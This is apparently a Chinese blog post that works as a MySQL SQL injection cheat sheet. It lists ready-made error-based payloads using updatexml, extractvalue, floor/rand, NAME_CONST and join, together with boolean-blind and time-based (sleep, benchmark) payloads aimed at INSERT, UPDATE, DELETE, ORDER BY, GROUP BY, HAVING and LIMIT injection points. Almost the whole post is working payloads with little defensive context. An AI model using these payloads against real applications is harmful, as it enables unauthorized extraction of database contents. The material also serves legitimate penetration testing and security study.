• Mysql 下 Insert、Update、Delete、Order By、Group By注入


    Insert:

    语法:INSERT INTO table_name (列1, 列2,...) VALUES (值1, 值2,....)

    报错注入:

    insert into test(id,name,pass) values (6,'xiaozi' or updatexml(1,concat(0x7e,(database()),0x7e),0) or '', 'Nervo');

    insert into test(id,name,pass) values (6,'xiaozi' or extractvalue(1,concat(0x7e,database())) or '', 'Nervo');

    盲注:

    //根据or之间的表达式是否成立来进行盲注
    'or 1=1 or ' //插入的测试语句直接当成sql语句执行,并把存储返回值,表达式成立,返回结果为1
    'or 1=2 or ' //表达式不成立,返回结果为0
    ' or exists(select * from information_schema.tables) or' //返回结果为1
    aaa' or length(database())=11 or '//返回正确
    aaa' or mid(database(),1,1)='t' or'//返回正确
    aaa' or mid(database(),1,11)='test' or '//返回正确

    insert into test(id,name,pass) values (2,'mis1',''or   ascii(mid(database(),1,1))=116 or'')

    时间盲注:

    insert into test(id,name,pass) values (2,'mis1',''or  if(mid(database(),1,1)='a',sleep(10),0) or'')

    Update:

    update test set pass='baidu' or updatexml(1,concat(0x7e,(version()),0x7e),0) or''WHERE id=2 and name='0';

    update test set pass='baidu' or extractvalue(1,concat(0x7e,database())) or''WHERE id=2 and name='0';

    Delete:

    DELETE FROM test WHERE id=2 or updatexml(1,concat(0x7e,(version()),0x7e),0) or'';

     DELETE FROM test WHERE id=2 or extractvalue(1,concat(0x7e,database())) or'';

    Order by:

    order by [id]---【注入点】

     SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1  and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))

    order by [id] desc/asc  ---【注入点】

     SELECT username FROM users WHERE isadmin = 0 GROUP BY username ORDER BY 1 desc ,(select count(*) from users group by concat(version(),0x27202020,floor(rand(0)*2-1))) 
    

      

    Limit 0,1:

    SELECT field FROM table WHERE id > 0 ORDER BY id LIMIT 【注入点】

    报错注入:

    mysql> SELECT field FROM user WHERE id >0 ORDER BY id LIMIT 1,1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1);  
    ERROR 1105 (HY000): XPATH syntax error: ':5.5.41-0ubuntu0.14.04.1' 

    如果注入点不是报错的,还可以使用 time-based 的注入,payload 如下:

    SELECT username FROM users WHERE isadmin = 0 limit 0,1 procedure analyse(extractvalue(rand(),concat(0x3a,(IF(MID(database(),1,1) LIKE 'w', BENCHMARK(5000000,SHA1(1)),5)))),1);  
    

      

    Group by:

    group by username --【注入点】

    SELECT username FROM users WHERE isadmin = 0 GROUP BY username and (select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)#
    

      

    Having :

    Having 1=1 --【注入点】

    SELECT username FROM users WHERE isadmin = 0 GROUP BY username  having 1=1 and (select count(*) from information_schema.columns group by concat(version(),0x27202020,floor(rand(0)*2-1)))
    

     

    Mysql报错注入:

    1、通过floor报错

    and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);

    and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

    2、ExtractValue

    and extractvalue(1, concat(0x5c,(select user())))

    3、UpdateXml

    and 1=(updatexml(1,concat(0x3a,(select user())),1))

    4、利用NAME_CONST注入

     and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

    5、join报错注入

    mysql> select *  from(select * from users a join users b)c;
    mysql> select *  from(select * from users a join users b using(id))c;

    mysql> select *  from(select * from users a join users b using(id,name))c;

    Mysql盲注:

    #select * from test where id =2 and length(version())=6
    #select * from test where id =2 and ascii(substring(version(),7,1))>1

    #select * from test where id =2 and length(database())=4
    #select * from test where id =2 and ascii(mid(database(),4,1))=116

    #select * from test where id =2 and (select length(version()))=6 
    #select * from test where id =2 and (select count(*) from test)=3

    Mysql时间盲注:


    #select * from test where id =2 and if(ascii(substring(user(),1,1))=114,benchmark(10000000,SHA1(1)),0)
    #select * from test where id =2 and if(ascii(substring(user(),1,1))=114,sleep(1),0)

    #select * from test where id =2 and if(substring(user(),1,1)='r',sleep(5),0)
    #select * from test where id =2 and if(substring(user(),1,1)=char(11),sleep(5),0)

    关于我:一个网络安全爱好者,致力于分享原创高质量干货,欢迎关注我的个人微信公众号:Bypass--,浏览更多精彩文章。

    参考资料:

    1、 Mysql报错注入原理分析(count()、rand()、group by)

    2、关于Mysql注入过程中的五种报错方式及具体利用案例

    3、利用insert,update和delete注入获取数据

    4、Testing Injection

    5、MySQL注入总结

  • 相关阅读:
    剑指 Offer 13. 机器人的运动范围
    32个触发事件XSS语句的总结
    CSS实现垂直居中的5种方法
    微信、QQ浏览器X5内核问题汇总
    值得关注的顶级开发者社区
    HTML5本地数据库(WebSQL)[转]
    按首字母排序汉字
    jQuery 源码中的 camelCase
    jQuery中的quickExpr
    手绘计划
  • 原文地址:https://www.cnblogs.com/xiaozi/p/5536562.html
Copyright © 2020-2023  润新知